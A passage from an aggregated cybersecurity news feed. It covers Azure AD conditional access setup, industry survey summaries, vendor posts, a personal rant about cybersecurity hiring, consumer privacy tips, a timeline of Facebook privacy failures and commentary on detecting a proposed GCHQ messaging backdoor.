  • Location: A location can be risky if its in a country with limited security policies or if the wireless network is unsecure or simply because its not a location where the organization typically does business. You can modify access requirements for sign-ins from locations that are not on an IP safe list or that are risky for other reasons. Users accessing a service when they’re off the corporate network should be required to use MFA.
  • Device platform: For this condition, define a policy for each device platform that either blocks access, requires compliance with Microsoft Intune policies, or requires the device be domain joined.
  • Device state: Use this condition to define policies for unmanaged devices.
  • Client apps: Users can access many cloud apps using different app types such as web-based apps, mobile apps, or desktop apps. You can apply security policies if an access attempt is performed using a client app type that causes known issues, or you can require that only managed devices access certain app types.
  • Cloud apps: This condition specifies unique policies for sensitive apps. For example, you can require that HR apps like Workday are blocked if Azure AD detects a risky sign-in or if a user tries to access it with an unmanaged device.

When a condition is met, you can choose what policy Azure AD will enforce:

  • Require MFA to prove identity.
  • Change the actions the user can take in cloud apps.
  • Restrict access to sensitive data (for example: limit downloads or sharing functionality).
  • Require a password reset.
  • Block access.

Once set, these policies will apply automatically without any manual intervention (Figure 1).

Figure 1. Azure AD automatically applies the policies you set based on condition.

Block legacy authentication and control access to highly privileged accounts

Old apps that use a legacy authentication method, such as POP3, IMAP4, or SMTP clients, can increase your risk because they prevent Azure AD from doing an advanced security assessment and dont allow more modern forms of authentication, such as MFA. We recommend you use client application conditional access rules (Figure 2) to block these apps entirely.

Figure 2. Apply conditional access rules to block client apps using legacy authentication methods.

You can also use conditional access rules to reduce the risk that highly privileged accounts or service accounts are compromised. For example, if your HR system uses a service account to access the email account, you can make sure it can only run against the service from a specific IP at the appropriate time of day.

Enhance conditional access with Intune and Microsoft Cloud App Security

Azure AD integrates with Intune, so that conditional access policies can consider the Intune device state as part of the policy, letting you set access controls for devices that have old operating systems or other security vulnerabilities. You can also use conditional access in Intune to make sure that only apps managed by Intune can access corporate email or other Office 365 services. Azure AD will enforce these rules.

Cloud App Security Conditional Access App Control extends conditional access to your SaaS apps. You can block downloads from apps, limit activities in the app, monitor risky users, or block access to the app entirely.

Once you have policies in place, we recommend that you use the Azure AD What If tool to simulate possible sign-in scenarios that your users may confront. The What If tool allows you to select a user, the app that user is trying to access, and the conditions of that sign-in to see which policies will apply. (Figure 3.) This step will give you a better sense of how your policies will impact your users. You can also check what policies do not apply to a specific scenario.

One final precaution: Be sure to set up an exception group for each conditional access policy, so you dont lock yourself out.

Figure 3. The Azure AD What If tool gives you a better sense of how your policies will impact your users.

Learn more

Check back in a few weeks for our next blog post, Step 5. Set up mobile device management, where well dive into how to plan your Intune deployment and set up mobile device management as part of your Unified Endpoint Management strategy.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

Resources

The post Step 4. Set conditional access policies: top 10 actions to secure your environment appeared first on Microsoft Secure.



Microsoft Secure

The biggest cybersecurity challenge? Communicating threats internally

IT executives responsible for cybersecurity feel a lack of support from company leaders, and 33 percent feel completely isolated in their role, according to Trend Micro. IT teams are under significant pressure, with some of the challenges cited including prioritizing emerging threats (47 percent) and keeping track of a fractured security environment (43 percent). The survey showed that they are feeling the weight of this responsibility, with many (34 percent) stating that the burden they … More

The post The biggest cybersecurity challenge? Communicating threats internally appeared first on Help Net Security.

$1.7 billion in cryptocurrency was stolen and scammed in 2018

$1.7 billion in cryptocurrency was stolen and scammed in 2018 — a dramatic rise in criminal activity despite a slump in the market, according to CipherTrace. Criminals need to launder all these funds in order to cash out before a wave of regulations go into effect in 2019. Theft from cryptocurrency exchanges accounted for the majority of the criminal activity: more than $950 million was stolen in 2018, representing 3.6 times more than in 2017. … More

The post $1.7 billion in cryptocurrency was stolen and scammed in 2018 appeared first on Help Net Security.

Meet the New Imperva – Defending Your Business Growth Today and Tomorrow

Imperva-Blog-CubePattern-1300x865

Today’s Imperva is a champion in the fight to secure data and applications, wherever they reside. The threat landscape is dangerous and ever-changing, but our thousands of customers know they can count on Imperva to protect them. No wonder our solutions are recognized as leaders by analysts such as Gartner and Forrester Research.  

However, security is changing. It’s no longer just about protecting your company’s digital assets. It’s also about protecting your employees, partners, customers, and all of their applications, data, API’s, microservices, and even IoT devices. Millions of interactions occur every day that drive business value – and revenue.

Within this vast new universe, traditional lockdown security approaches just don’t cut it anymore. They’re too rigid, create their own security gaps, and stifle your business. What you need is a security posture that assumes an open exchange between data, applications and users. To do that successfully, you need greater visibility into all your digital systems, whether on-premises or in the cloud, so you can quickly pinpoint the threats that matter. You also need agility to adapt to fast-changing DevOps environments. And you need resilient systems that not only prevent data breaches and DDoS attacks but can also recover quickly, too.

In short, your business’s security needs are evolving. Which is why Imperva is also evolving, in order to remain the defender of your business growth, so you never have to choose between innovating for your customers and protecting what matters.

This year, we’ll be launching major expansions to our data and application security solutions. We’re also boosting the visibility delivered by them, distilling millions of data points so that you have actionable insights and the ability to automate the responses that protect your business.

To make it easier for you to focus on your business, we’re also simplifying how we bring our products to market, from the naming, to the packaging, to the pricing. Through a subscription model we call FlexProtect, enterprises can deploy Imperva solutions how and when you need them, in order to quickly gain the protection you need.

This year, Imperva will also be introducing useful new research and thought leadership to help your organization get smarter and respond to threats faster. Additionally, we are committed to making your experience with our brand and products even better. We are introducing an all-new look and feel, which you can check out today starting with our website, the new Imperva.com!

Doing business today has never been more potentially rewarding – or challenging. Security providers need to be up to the task. That’s why Imperva is evolving. We do more than simply guard your data and apps. We’ll help you anticipate real threats, minimize the business impact of any incidents, and build customer trust – all without overstretching limited resources. As your own business evolves, so does Imperva, so we can remain your defender and help you realize your growth ambitions, today and tomorrow.

Imperva

Protect the pulse of your business.

The post Meet the New Imperva – Defending Your Business Growth Today and Tomorrow appeared first on Blog.

How privacy and security concerns affect password practices

Yubico announced the results of the company’s 2019 State of Password and Authentication Security Behaviors Report, conducted by the Ponemon Institute, who surveyed 1,761 IT and IT security practitioners in the United States, United Kingdom, Germany and France. Understanding behavior The purpose of this study is to understand the beliefs and behaviors surrounding password management and authentication practices for individuals both in the workplace and at home. The goal was to understand if these beliefs … More

The post How privacy and security concerns affect password practices appeared first on Help Net Security.

Pros & Cons of a Career in Cybersecurity

Cybersecurity is becoming an increasingly popular career choice. Why, you wonder? Read below to find out what InfoSec professionals say are the pros and cons of a career in this field.

Reading from a mobile? Click on the image to fit your screen.

Sources: IT GovernanceBeyond TrustQuora

Aspiring to learn modern penetration testing skills and techniques? Check out our Penetration Testing Professional (PTP) training course, or get your free trial below.
GET FREE TRIAL

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

What steps consumers need to take to protect themselves online

Yesterday was Data Privacy Day, so McAfee warned consumers that cybercriminals are continuing to access personal information through weak passwords, phishing emails, connected things, malicious apps and unsecure Wi-Fi networks. Weak Passwords Consumers often pick simple passwords for the multiple accounts they use daily, not realizing that choosing weak passwords can open the door to identity theft and identity. Tip: Use strong passwords that include uppercase and lowercase letters, numbers and symbols. Don’t use the … More

The post What steps consumers need to take to protect themselves online appeared first on Help Net Security.

A Shortage in Common Sense: The Myth of the Talent Gap

I have a visceral reaction every time I encounter yet another article bemoaning the so-called "talent gap" or "labor gap" in cybersecurity. Having been in and out of the job market several times over the past decade (for better and, more often, for worse), I can honestly say this is utter nonsense. The roots of this clamor began more than a decade ago in DC as federal agencies grappled with modernizing, making use of the annual Sept/Oct budget season to decry how poor and helpless they were in order to justify demands for ever-increasing budgets. Local universities (such as UMUC) quickly caught on to the marketing plan and rapidly launched a cybersecurity degree program. Meanwhile, ISC2 helped ensure that the CISSP was a mandatory component for hiring in many positions.

While I am still in the midst of a job search (one that's a year old at this point), I find I need to speak out on the recent TechCrunch OpEd piece "Too few cybersecurity professionals is a gigantic problem for 2019" in order to address some of the nonsensical statements made that really have no business being taken seriously. The author does get a couple things right, but not enough to compensate for perpetuating many myths that need to be put to rest.

Allow me to start by addressing some sound-bites from the piece:

"Seasoned cyber pros typically earn $95,000 a year, often markedly more, and yet job openings can linger almost indefinitely. The ever-leaner cybersecurity workforce makes many companies desperate for help."

There are several reasons why positions often sit open for long periods of time: they require an existing clearance; hiring managers are obtusely fixated on experience with a very narrow list of tools (a tool is a tool is a tool!); recruiters aren't even passing resumes along to hiring managers, often because of a failure to find keywords, sometimes because of useless biases (e.g., I've had several short stints due to layoffs and projects being terminated - outside my control! - which is used to rule me out), or just as often because they don't have the first clue what they're looking for; positions are requiring "experience" with far too many things; the interview process focuses too much on tool fit rather than people fit, including failing to evaluate attitude, aptitude, and adaptability.

The bottom line here is this: if you see a position that's been open a long time, then that's a red flag. Something is broken in the hiring process. There are literally thousands (likely tens of thousands) of quality candidates on the market today with varying degrees of experience all trying to find work, and yet we cannot land these positions because of arbitrary requirements.

Oh, and by the way, one of those arbitrary requirements is geographical. If you have 2 or more offices in separate geographic areas, then you have an implicit "remote worker" policy, because a certain percentage of your workforce is working in a location separate from your primary HQ. Not everyone wants to live in big cities. Not everyone wants to move to key tech "capitals" like Silicon Valley or Austin, TX, or Seattle or NYC or DC or Boston. Those places are all expensive (in some cases very expensive) and, especially for junior hires, completely inaccessible financially. It is beyond time to support remote workers and introduce flexibility into the workplace. It's ironic that in 1998-2001, when there was also allegedly a labor shortage, companies were willing to do far more things to attract and retain talent. All of that has gone away since the recession in 2009. It's time to wake up and change.

"Between September 2017 and August 2018, U.S. employers posted nearly 314,000 jobs for cybersecurity pros."

Posting a job with "cybersecurity" (or comparable) in a title or description is a far cry from the position actually being oriented to cybersecurity. This is a situation that has worsened in the last few years. I encounter numerous "cybersecurity" roles that have little-to-nothing to do with cybersecurity. For example, it's very common to find "DevSecOps" positions that are acutely focused on DevOps automation. Or, sometimes they're just recast application security roles that got a trendy bump to "DevSecOps." Similarly, the "security architect" title has become a veritable grab bag of random terms, tools, and duties, and can be anything from a SOC analyst to hands-on engineer to manager to developer and so on.

Authors of job postings are really doing themselves and the labor pool a major disservice by failing to write clear, concise, accurate job postings. It's very common to encounter posts that list everything but the kitchen sink, not because they need actual direct experience with everything under the sun, but because they aspirationally believe that some day they might need those skills, or, worse, because they really need hire 5 people, but only got approval for 1 slot, and so they try to find a mythological being who's expert in secure coding, appsec, netsec, cloud security, container security, traditional infrastructure, cloud infrastructure, divination, unicorn taming, and budget mastery. Worse, they then start out interviews by asking if the candidate has experience with a handful of tools, and failing that, either drop the candidate (because oooOOOOooo there's magic in big security vendor tools) or force them to continue through a process that reveals an increasingly bad fit.

And now, the kicker: You shouldn't be hiring this many security people anyway! There's a delicious irony to being interviewed for a dedicated and growing cybersecurity team/program that espouses "build security in" ideology. If your org is really so interested in building security into everything, then quit trying to create massive cybersecurity teams/programs that only lead to failed old enablement practices and "otherness" that actually alienates your internal clients and decreases security. But I digress...

"Companies are trying to cope in part by relying more aggressively on artificial intelligence and machine learning, but this is still at a relatively nascent stage and can never do more than mitigate the problem."

First, never say never, m'kay? That's just silly. Second, while vendors are aggressively pushing AI/ML solutions, most of it isn't even AI or ML (it's amazing how many products are just elaborate regex schemes under the hood!). The phrase "snake oil" comes to mind. Third - and this is very important! - the focus should absolutely, positively be on automation and orchestration today. There are tons of things that can be automated, and there is a growing pool of reasonably qualified candidates with experiencing using generic A&O tools (e.g., ansible, puppet, chef, etc.).

The key takeaway here is this: AI/ML is an easy target for throwing stones, but the comment obscures an important lesson, which is that organizations are not doing enough with automation and orchestration, especially as it pertains to security. This reality needs to be remedied ASAP!

"These are ideal candidates, but, in fact, the backgrounds of budding cyber pros need not be nearly this good."

There is no perfect, and perfect is the enemy of good. Hiring managers, HR, and recruiters: pay attention! You. Should. Be. Hiring. For. People. Fit. And. Aptitude. FULL STOP. If you're having trouble "finding good candidates," then YOU ARE THE PROBLEM. I could rant endlessly on this point, but won't. Introspection, please.

"Almost no cybersecurity pro over 30 today has a degree in cybersecurity and many don't even have degrees in computer science."

Mmmmmmmmmmaaaaybe. I'm over 30. I have an undergrad in CompSci. I have a Master's degree in Engineering Mgmt with a concentration in InfoSec Mgmt. Also, the older millenials are now hitting their 30s. Cybersecurity (or comparable) degrees have been around for 15+ years. This statement is in many ways demonstrably false, but more important IT DOESN'T MATTER ONE BIT!

The problem, again, is with the hiring process, including having arbitrary "requirements" that artificially shrink the labor pool (which is the point the author seems to be making here). QUIT HIRING BASED ON A PUNCH LIST! Sing it with me: attitude, aptitude, and adaptability! These are the key qualities you should be seeking in the majority of hires.

Here's a perfect example: I interviewed in mid-2018 for a "security architect" role that had been open for a very long time (red flag!). When I hopped on what I thought was a quick intro call with the hiring manager, I was instead met with the hiring manager and 2 reports (red flag!). The 2 reports gushed over how awesome the hiring manager was to work for (odd), and then they launched into questions. Every single question was about hadoop security, even though the first question they asked was "do you have extensive experience securing hadoop?" to which I answered "none, really, but it's just a NOSQL data store, so *shrug*." Moreover, the hiring manager was a total jerk on the call (not sure if this was being done as a stress test tactic or because the guy was just a jerk). I would be asked a question, I would start to answer (literally, I'd just get a couple words out of my mouth, like "Well, for starters...") and the hiring manager would jump in, tell me my answer was insufficient (I hadn't even answered yet!), and then demand I "get to the point." Suffice to say, I cut the interview off and then provided strong feedback to the third-party recruiter to run away.

There are 2 lessons from this experience: 1) The job description (JD) was completely and wholly inadequate. While it mentioned hadoop experience as a requirement, it became immediately clear that they didn't so much want a security architect as they wanted a hadoop expert (go get a contractor - sheesh!). 2) Don't be jerks to candidates! If that hiring manager is allowed to exist and persist within that organization, then that is absolutely not a place I would ever consider working (and have avoided applying or being submitted there ever since).

Key takeaways: If you're having trouble finding candidates, make sure the JD is accurate, and make sure your hiring manager is doing a good job representing the company. It's still a small industry and many of us talk and share stories. Wanna kill your applicant pool? Become known as a horrible place to work that's filled with belligerents and "brilliant jerks." I'm a big fan of Reed Hastings' (Netflix) "no brilliant jerks" policy. Hugely and most biggestly important.

"Asking too much from prospective pros isn't the only reason behind the severe cyber manpower shortage."

Perhaps not, but it's a major factor in hiring decisions. If you cannot offer any semblance of work-life balance, especially for your experienced hires who may very well have families, then you need to re-evaluate your org culture. Moreover, organizations must immediately stop trying to hire single resources to fill 5 different roles. These candidates are rare, if they exist at all, and it's killing your hiring process. More importantly, it means you don't actually know your priorities, AND... it says you're not willing to invest in your people to help them develop into the retainable talent you so desperately need. Once again, it's time for some serious introspection here!

"One key finding was that 43% of those polled said their organization provides inadequate security training resources, heightening the possibility of a breach."

Ya gotta love the orthogonal throw-away quip... this comment has nothing to do with the "labor gap," nor is it about the challenges of tech hiring. This point actually pertains directly to organizational culture. At face, it's true, insomuch as organizations tend to over-rely on annual security (and privacy) training, among other things. However, what it really reflects is a huge problem with pretty much all organizations in that they don't really make security a priority, they don't make it a shared responsibility, and they don't hire the right people in HR, org dev, or security to help executive leadership transform org culture in a favorable and necessary manner.

"IBM, for example, creates what it calls "new collar" jobs, which prioritize skills, knowledge and willingness to learn over degrees."

"Technology companies still must work much harder to broaden their range of potential candidates, seeking smart, motivated and dedicated individuals who would be good teammates."

To close on something a bit more positive, I very much agree with and appreciate these points. But, again, this is all about organizations needing to fix themselves, and ASAP at that. If you think hiring for a cybersecurity role is purely about running down a list of arbitrary "requirements" and only accepting candidates who meet all (or most) of them, then you're failing. I've mentioned it several times throughout my post here, and I'll say it once again: Hire for attitude, aptitude, and adaptability!!! If you don't know how to do this, then get educated and fix your hiring process.

The analogy I've used of late is this: A car repair shop does not hire a mechanic simply because they know how to use metric vs. standard/imperial wrenches. No sane person would say "oh, I'm sorry, you only know how to use wrenches in millimeter sizes, but we need someone who can use a wrench in fractions of inches." Think about that for a second! How insane would that be?! And yet... this is exactly how the vast majority of orgs are trying to hire tech talent. "Oh, I'm sorry, you've worked with Symantec, but not McAfee or Trend? We need someone experienced with those other brands." Or, "Oh, we're a Rapid7 shop here, so I don't see how your Tenable (or Qualys) experience really applies." Or, "When were you last 'hands-on' in a role? Oh, I see, it's been a few years? Well, thanks for your time..." Etc. Etc. Etc.

These are all things I have experienced first-hand in the past year. Tech is tech, tools are tools, and the most important thing is my willingness and ability to learn and adapt. But, alas, very few organizations want to invest in their people. Very few organizations know how to interview for attitude, aptitude, and adaptability. It's truly sad, and I think it's a skill that organizations have actually lost in the last 10-15 years. I had a great job with AOL, and I landed it not because I had experience with every security tool on the market, but because I had a solid base technical knowledge and I had the attitude, aptitude, and adaptability to quickly learn and apply new things. THIS HAS BEEN LOST IN TODAY'S JOB MARKET.

---
To close this ranty post out, I just want to reiterate, for the umpteenth time, that I strongly believe the "talent gap" or "labor shortage" is largely imagined and manufactured because organizations don't know how to hire, make absolutely no commitment to train and retain their people, and have in general completely lost their way. It's very sad and very troubling. We used to know how to do this! Where have all these skills gone within HR and management?

Part of these issues are a direct result of cuts made during previous economic down-turns, but I also suspect that we're seeing the "day-trader" mentality as it hits hiring, too. In this age of 24x7 news and pervasive, ubiquitous social media, and endless amounts of raw outrage... we have lost our humanity within organizations. Human resources has always ultimately been about protecting organizations from their people, but it has really gotten broken badly in the past decade. Hiring managers are often forced to do too much with too little, all while being stuck following grossly outmoded thinking and strategies (e.g., if you build a SOC today thinking people first, then automation and orchestration, then I'm sorry to say that you're already starting 10 yrs behind the curve).

If you're trying to hire people, then you need to force introspection and open dialogue within your organization, and you need to DO IT NOW. I'm a GenX'er. I want to do good work with a good org and good team where I'm treated respectfully, but allowed work-life balance. I would like to have some meaning in my job. Younger generations are reportedly even more concerned about this last point, wanting to contribute meaningfully. Once upon a time, I was told by a higher-up that corporations could not exist if they weren't benefiting the general good of society. I'm not completely sure this is true, but I would love for it to be so. However, in application, what this means is that organizations must also take care of their people, which many are failing at today. Forget about all the various movements and management fads out there and take this to heart: If you want good employees who will stick with you, then you have to hire good people AND TREAT THEM RIGHT. It really is just that simple.

As a closing remark, I strongly recommend that people go read Laloux's Reinventing Organizations as it is remarkable and a necessary evolution in business management.

Addendum (1/31/19): One additional observation: Numbers lie. I have found here in the DC market that many jobs get reposted multiple times by placement/search firms. Positions, for example, with major firms like Fannie, Freddie, ManTech, DHS, CapOne, etc., will often show up a dozen times or more, but listed by the headhunter firms and not the actually hiring company. So, imagine that out of, say, 300k job postings for "cybersecurity," that number may actually be closer to 25-30k in real jobs. Quite shocking to think about and realize, and as a job searcher it's extremely frustrating. I'll literally get a flurry of inquiries from a half dozen or more recruiters when a new position posts. Crazy.

Sharing Isn’t Always Caring: 3 Tips to Help Protect Your Online Privacy

It’s 2019 and technology is becoming more sophisticated and prevalent than ever. With more technology comes greater connectivity. In fact, by 2020, there will be more than 20 billion internet-connected devices around the world. This equates to more than four devices per person. As we adopt new technology into our everyday lives, it’s important to consider how this emerging technology could lead to greater privacy risks if we don’t take steps to protect our data. That’s why the National Cyber Security Alliance (NCSA) started Data Privacy Day to help create awareness surrounding the importance of recognizing our digital footprints and safeguarding our data. To further investigate the impact of these footprints, let’s take a look at how we perceive the way data is shared and whose responsibility it is to keep our information safe.

The Impact of Social Media

Most of us interact with multiple social media platforms every day. And while social media is a great way to update your friends and family on your daily life, we often forget that these platforms also allow people we don’t really know to glimpse into our personal lives. For example, 82% of online stalkers use social media to find out information about potential victims, such as where they live or where they go to school. In other words, social media could expose your personal information to users beyond your intended audience.

Certain social media trends also bring up issues of privacy in the world of evolving technology. Take Facebook’s 10-year challenge, a recent viral trend encouraging users to post a side-by-side image of their profile pictures from 2009 and 2019. As WIRED reporter Katie O’Neill points out, the images offered in this trending challenge could potentially be used to train facial recognition software for age progression and age recognition. While the potential of this technology is mostly mundane, there is still a risk that this information could be used inequitably.

How to Approach Requests for Personal Data

Whether we’re using social media or other online resources, we all need to be aware of what personal data we’re offering out and consider the consequences of providing the information. While there are some instances where we can’t avoid sharing our personal data, such as for a government document or legal form, there are other areas where we can stand to be a little more conservative with the data that we divulge. For example, many of us have more than just our close family and friends on our social networks. So, if you’re sharing your location on your latest post, every single person who follows you has access to this information. The same goes for those online personality quizzes. While they may be entertaining, they put an unnecessary amount of your personal information out in the open. This is why it’s crucial to be thoughtful of how your data is collected and stored.

So, what steps can you take to better protect your online privacy? Check out the following tips to help safeguard your data:

  • Think before you post. Before tagging your friends on Instagram, sharing your location on Facebook, or enabling facial recognition, consider what this information reveals and how it could be used by a third-party.
  • Set privacy and security settings. If you don’t want the entire World Wide Web to be able to access your social media, turn your profiles to private. You can also go to your device settings and choose which apps or browsers you want to share your location with and which ones you don’t.
  • Enable two-factor authentication. In the chance your data does become exposed, a strong, unique password can help prevent your accounts from being hacked. Furthermore, you can implement two-factor authentication to stay secure. This will help strengthen your online accounts with a unique, one-time code required to log in and access your data.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Sharing Isn’t Always Caring: 3 Tips to Help Protect Your Online Privacy appeared first on McAfee Blogs.

Industry reactions to Data Privacy Day 2019

The purpose of Data Privacy Day is to raise awareness and promote privacy and data protection best practices. Data Privacy Day began in the United States and Canada in January 2008 as an extension of the Data Protection Day celebration in Europe. Data Privacy Day is observed annually on Jan. 28. Cindy Provin, CEO, nCipher Security These high profile policy developments are sending a signal that the days of using personal data for commercial advantage … More

The post Industry reactions to Data Privacy Day 2019 appeared first on Help Net Security.

How to know when you’re ready for a fractional CISO

Many companies eventually find themselves in the following situation: they’re growing, their technology, infrastructure and teams are expanding, perhaps a M&A is on the horizon, and the board is asking pointed questions about security. It’s usually at this point that a business starts to notice fissures in the walls of what once felt like a tightly locked structure. New challenges in operations, culture, and security begin to arise. Inevitably, when a company hits this phase … More

The post How to know when you’re ready for a fractional CISO appeared first on Help Net Security.

How accepting that your network will get hacked will help you develop a plan to recover faster

As anyone in the network security world will tell you, it is an extremely intense and stressful job to protect the corporate network from ever-evolving security threats. For a security team, a 99 percent success rate is still a complete failure. That one time a hacker, piece of malware, or DDoS attack brings down your organization’s network (or network availability) is all that matters. It’s even more frustrating when you consider that the proverbial ‘bad … More

The post How accepting that your network will get hacked will help you develop a plan to recover faster appeared first on Help Net Security.

Facebook: A timeline of security failings

Facebook is the world’s most popular social network, boasting 2.27 billion active users every month. That’s 2.27 billion people who trust all kinds of personal information to Facebook for safe-keeping.

Unfortunately, Facebook doesn’t have a great track record of protecting it’s users. This timeline shows some of the biggest privacy breaches since 2005.

December 2005

To help demonstrate threats to privacy caused by “over sharing” on social networks, a team of researchers publish a script that allows them to download user data from Facebook. The team manage to acquire personal data from 70,000 profiles, arguing that businesses are carrying out similar activities, stealing data without the permission of the affected users.

December 2007

Facebook releases a new product called “Beacon”, designed to help advertisers better understand their audience by tracking their movements on other websites. Beacon extends the user’s Facebook profile based on this behaviour, recording videos hired from Blockbuster Video for instance. This feature breaks the American Video Privacy Protection Act, and Facebook is forced to settle a $9.5 million class action lawsuit brought by affected users.

December 2009

Facebook publicly publish information marked private on users’ pages. A Federal Trade Commission investigation forces Facebook to apologise, and to promise improved management and protection of personal data.

June 2013

Facebook announces discovery of a bug that allows users to download contact information belonging to friends of friends – without asking permission. Official estimates suggest that as many as 6 million people have their personal information taken in this way.

February 2014

A new data-driven start-up called Cambridge Analytica asks volunteers to install a new Facebook app called thisisyourdigitallife. The app then downloads information from the user’s profile, including lists of friends, likes and some private messages.The app breaks Facebook’s terms of service, but remains in place until December 2015. By then 87 million profiles have been harvested by Cambridge Analytica, ready for use in targeting fake news stories and other marketing-related activities.

Facebook has already been fined £500,000 by the UK’s Information Commissioner for its part in the Cambridge Analytica scandal. The issue remains under investigation in the US and elsewhere.

April 2018

Facebook is forced to announce that ‘malicious actors’ have used the built-in search function to harvest the public profile data of almost their entire user base. Almost all 2 billion users have had their data collected by third parties without their permission.

June 2018

Journalists uncover “secret” agreements between Facebook and several smartphone manufacturers. In return for improving the Facebook experience on their devices, Samsung, Microsoft, Apple, Huawei, Lenovo and others have been given access to personal data belonging to the phone’s owner and their friends. Even if those friends have chosen not to share their data with third parties.

July 2018

A new bug overrides users’ block lists. For 8 days, blocked users are able to see personal information against the wishes of account holders.

August 2018

The popular data-saving app Onavo) is removed from the App Store after complaints that web activity is being collected by Facebook (Onavo’s owner), violating Apple’s privacy rules.

September 2018

A new bug in the “view as” feature allows hackers to forge authentication tokens and take control of up to 50 million user accounts.

Be careful who you trust with your data

Over the past 13 years Facebook has become a victim of its own success. With access to the personal data belonging to more than 2 billion people, the social network is a natural target for hackers and cyber criminals – but a relaxed attitude to security and privacy has only made it easier for malicious activity to thrive.

All Facebook users should regularly check their privacy and security settings to ensure they are using the tools provided to protect themselves. In the long term however, questions need to be asked whether the benefits of Facebook outweigh the obvious risks to their online safety.

The post Facebook: A timeline of security failings appeared first on Panda Security Mediacenter.

Why it’s important for organisations to train staff in cybersecurity

Breaches are an ongoing issue that organisations face on a day to day basis. For as long as risk carries

Why it’s important for organisations to train staff in cybersecurity on Latest Hacking News.

Hacking the GCHQ Backdoor

Last week, I evaluated the security of a recent GCHQ backdoor proposal for communications systems. Furthering the debate, Nate Cardozo and Seth Schoen of EFF explain how this sort of backdoor can be detected:

In fact, we think when the ghost feature is active­ -- silently inserting a secret eavesdropping member into an otherwise end-to-end encrypted conversation in the manner described by the GCHQ authors­ -- it could be detected (by the target as well as certain third parties) with at least four different techniques: binary reverse engineering, cryptographic side channels, network-traffic analysis, and crash log analysis. Further, crash log analysis could lead unrelated third parties to find evidence of the ghost in use, and it's even possible that binary reverse engineering could lead researchers to find ways to disable the ghost capability on the client side. It should be obvious that none of these possibilities are desirable for law enforcement or society as a whole. And while we've theorized some types of mitigations that might make the ghost less detectable by particular techniques, they could also impose considerable costs to the network when deployed at the necessary scale, as well as creating new potential security risks or detection methods.

Other critiques of the system were written by Susan Landau and Matthew Green.

EDITED TO ADD (1/26): Good commentary on how to defeat the backdoor detection.

GDPR-ready organizations see lowest incidence of data breaches

Organizations worldwide that invested in maturing their data privacy practices are now realizing tangible business benefits from these investments, according to Cisco’s 2019 Data Privacy Benchmark Study. The study validates the link between good privacy practice and business benefits as respondents report shorter sales delays as well as fewer and less costly data breaches. Business benefits of privacy investments The GDPR, which focused on increasing protection for EU residents’ privacy and personal data, became enforceable … More

The post GDPR-ready organizations see lowest incidence of data breaches appeared first on Help Net Security.

83% of global respondents experienced phishing attacks in 2018

Proofpoint analyzed data from tens of millions of simulated phishing attacks sent over a one-year period, along with nearly 15,000 cybersecurity professional survey responses, to provide an in-depth look at state of global phishing attacks. Overall, 83 percent of global infosecurity respondents experienced phishing attacks in 2018, up from 76 percent in 2017, and nearly 60 percent saw an increase in employee detection following security awareness training. In addition, more organizations were affected by all … More

The post 83% of global respondents experienced phishing attacks in 2018 appeared first on Help Net Security.

The most effective security strategies to guard sensitive information

Today’s enterprise IT infrastructures are not largely hosted in the public cloud, nor are they SaaS-based, with security being the single largest barrier when it comes to cloud and SaaS adoption. With the recent rise in breaches and privacy incidents, enterprises are prioritizing the protection of their customers’ personally identifiable information, according to Ping Identity. Most infrastructure is hybrid Less than one quarter (21%) of IT and security professionals say that more than one half … More

The post The most effective security strategies to guard sensitive information appeared first on Help Net Security.

Enterprises turn to MSPs to mitigate huge skills gap concerns

A huge skills gap coupled with security worries is driving IT decision makers to engage Managed Service Providers (MSPs) to handle their IT needs, according to NTT Com. Of the 417 IT decision makers in the US from large enterprises across all industries who participated in the research study, 26 percent put security risks as their biggest challenge in managing in-house IT. This was followed by infrastructure complexity (10 percent). In addition, 16.5 percent said … More

The post Enterprises turn to MSPs to mitigate huge skills gap concerns appeared first on Help Net Security.

Research Suggests Human Error Responsible for Cyber Security Breaches

Cybersecurity incidents can be a huge problem for businesses and individuals. Hackers using malware to steal data is often the scenario

Research Suggests Human Error Responsible for Cyber Security Breaches on Latest Hacking News.

DNS hijacking of Department of Homeland Security causes emergency directive to be issued

As part of an emergency directive, the Department of Homeland Security (DHS) ordered federal government agencies to carry out audits

DNS hijacking of Department of Homeland Security causes emergency directive to be issued on Latest Hacking News.

Organizations waste money storing useless IT hardware

A survey of 600 data center experts from APAC, Europe and North America reveals that two in five organizations that store their data in-house spend more than $100,000 storing useless IT hardware that could pose a security or compliance risk. Astonishingly, 54 percent of these companies have been cited at least once or twice by regulators or governing bodies for noncompliance with international data protection laws. Fines of up to $1.5 million could be issued … More

The post Organizations waste money storing useless IT hardware appeared first on Help Net Security.

Branching out more efficiently and securely with SD-WAN

As enterprises expand, through organic growth or acquisition, they need to support the IT needs of more distributed locations. These often include teams in shared office spaces versus enterprise-owned or leased facilities. To serve remote locations and users, enterprises are rapidly moving toward cloud-based applications including Unified Communications as a Service (UCaaS). As always, IT teams are under pressure to contain costs and are turning to Software Defined Wide Area Networks (SD-WAN) to play a … More

The post Branching out more efficiently and securely with SD-WAN appeared first on Help Net Security.

Reimagining risk management to mitigate looming economic dangers

In a volatile market environment and with the edict to “do more with less,” many financial institutions are beginning efforts to reengineer their risk management programs, according to a new survey by Deloitte Global, with emerging technologies in the driver’s seat. Seventy percent of the financial services executives surveyed said their institutions have either recently completed an update of their risk management program or have one in progress, while an additional 12 percent said they … More

The post Reimagining risk management to mitigate looming economic dangers appeared first on Help Net Security.

Cyberattacks fueled by geopolitical tension are increasing

Billions of personal records were stolen in 2018, unearthed in breaches that successfully targeted household names in government, technology, healthcare, travel and hospitality. Compounding the problem has been increased geopolitical tension between western democracies and countries like Russia, China and North Korea. Modern cyberattacks appear to increasingly be fueled by geopolitical tension and reveal how clever attackers have become in evolving to remain undetected — using techniques such as lateral movement, island hopping and counter … More

The post Cyberattacks fueled by geopolitical tension are increasing appeared first on Help Net Security.

Federal Cybersecurity Posture “Untenable,” According to OMB Risk Report

When he issued Executive Order 13800 (EO 13800) on Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure, President Trump’s goal was to highlight that security and public accountability of government officials are foundational pillars while emphasizing the importance of reducing cybersecurity risks to the Nation. In accordance with the Executive Order, effective cybersecurity requires […]… Read More

